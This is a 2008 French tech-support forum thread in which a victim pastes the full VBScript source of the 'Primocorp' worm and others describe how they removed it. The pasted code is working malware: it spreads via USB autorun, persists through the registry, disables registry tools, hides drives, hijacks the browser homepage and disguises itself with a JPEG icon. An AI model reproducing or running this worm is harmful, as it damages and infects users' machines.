karimb11
Messages postés1Date d'inscriptionmercredi 1 octobre 2008StatutMembreDernière intervention 1 octobre 2008
-
1 oct. 2008 à 18:35
Fouad -
26 nov. 2008 à 14:58
Bonjour,
J'ai été sois disant "infecté" par un pseudo virus : un script vB, qui beug le PC : Primocorp.
J'ai réussi à le contrôler, mais lors du redémarrage du PC, il revient.
Voilà le script vB executé :
AIDEZ MOI A SUPPRIMER/MODIFIER LES CLES SANS RISQUE.
' VB Script Document
'Slt les ptits c'est la primteam ki est dans la place
On error resume Next
demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System"
Dim fso,usb,Textautorun
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set chemin= FSO.GetSpecialFolder(1)
Textautorun="[autorun]"&vbcrlf&"shellexecute=wscript.exe vl@dock.vbs"&vbcrlf&"action=""pas d'action"""
location=wscript.scriptfullname
do
'lancement de la fonction de copie du virus'
msgcopy chemin, "vl@dock"
starting chemin 'Inscription du virus dans la base de registre pour un demarage automatique'
iconchange 'Execution de la fonction de changement de l'aspect de l'icone des Vbs en Jpeg'
primreg 'execution de la fonction de changement du registre'
Webracourci 'création d'un raccourci web sur le bureau'
'Lancement de la copie du virus et d'autorun sur tout les disques connectés au Pc
for each usb in fso.drives
if(usb.drivetype=1 or usb.drivetype=2)and usb.path <> "A:" then
chemin2=usb.path
msgcopy chemin2, "vl@dock"
set SystemaChem=fso.getfile(chemin2&"\vl@dock.vbs")
SystemaChem.attributes=7
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
set SystemaChem=fso.createtextfile(chemin2&"\autorun.inf",2,true)
SystemaChem.write Textautorun
SystemaChem.close
set SystemaChem=fso.getfile(chemin2&"\autorun.inf")
SystemaChem.attributes=7
end if
next
loop while time<>"00:00:00"
'--------------------------------------------------------------------------------
'fonction de copie du virus sur le disque et voilage de son existence
sub msgcopy(x,name)
File = Wscript.ScriptFullName
fso.copyfile file ,x & "\" & name & ".vbs"
set SystemaChem=fso.getfile(chemin&"\vl@dock.vbs")
SystemaChem.attributes=7
end sub
'--------------------------------------------------------------------------------'
'fonction d'inscription de valeurs dans le régistre
sub primreg()
Set WshShell = WScript.CreateObject("WScript.Shell")
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.primocorp.fb.bz/","REG_SZ"
'Bloque le changement de la page de démarrage
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\",""
wshshell.regWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage","1","REG_DWORD"
'Interdit l'ouverture de la base de régistre
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
'Affiche mon message de propagande
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Slt c'est ---LIEH@CKER--- le N°1 des hackers ---"
'Affiche le message de raliement
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption","BIENVENUE A LA PRIMTEAM!!! REJOIGNEZ
NOUS VITE"
wshshell.regWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Slt nous sommes les 1er hacker de la Cô
te d'Ivoire!!!----si vous voulez nous rejoindre ecrivez nous(faroteur_2006@yahoo.fr) a+++ "
'Cache les disques dur de la machine
wshshell.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives","8","REG_DWORD"
end sub
'--------------------------------------------------------------------------------'
'Inscription dans le registre pour une execution au demarage de windows
sub starting(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrage,location & "\vl@dock.vbs"
end sub
'--------------------------------------------------------------------------------'
'Changement de l'icone de Vbs en Jpeg
sub iconchange()
Dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
end sub
'--------------------------------------------------------------------------------'
'Création d'un raccourci web sur le bureau
sub Webracourci()
Dim Shell, DesktopPath, URL
Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("Desktop")
Set URL = Shell.CreateShortcut(DesktopPath & "\Primocorp.URL")
URL.TargetPath = "http://www.primocorp.fb.bz"
URL.Save
end sub
'--------------------------------------------------------------------------------'
Salut
j'ai eu le meme robleme dernierement
discription du virus :
1- il change la page d'acceuil sur iexplorer
2- puis bloque le choix du changement de cette page
3- il cache le disque d si vous avez une 2 partition
4- il demarre au debut en annancant le primteam .........
j'ai utiluse
regrunplat570
et
Malware Scanner 3.1.1.0
le premier pour eliminer le virus le 2 pour activer le disque dur
mais le probleme subsiste avec le lancement du message au demarrage
Salam,
J'ai eu le même PB.
La solution que j'ai suivi :
- Télécharger Adaware et un éditeur de registre.
- J'ai analyser avec Adaware.
- J'ai réécris les clès de registre qui ont été modifiées par le virus.
- Redémarrer la machine.
26 nov. 2008 à 14:58
J'ai eu le même PB.
La solution que j'ai suivi :
- Télécharger Adaware et un éditeur de registre.
- J'ai analyser avec Adaware.
- J'ai réécris les clès de registre qui ont été modifiées par le virus.
- Redémarrer la machine.
ET Hamdoullah, plus de problème...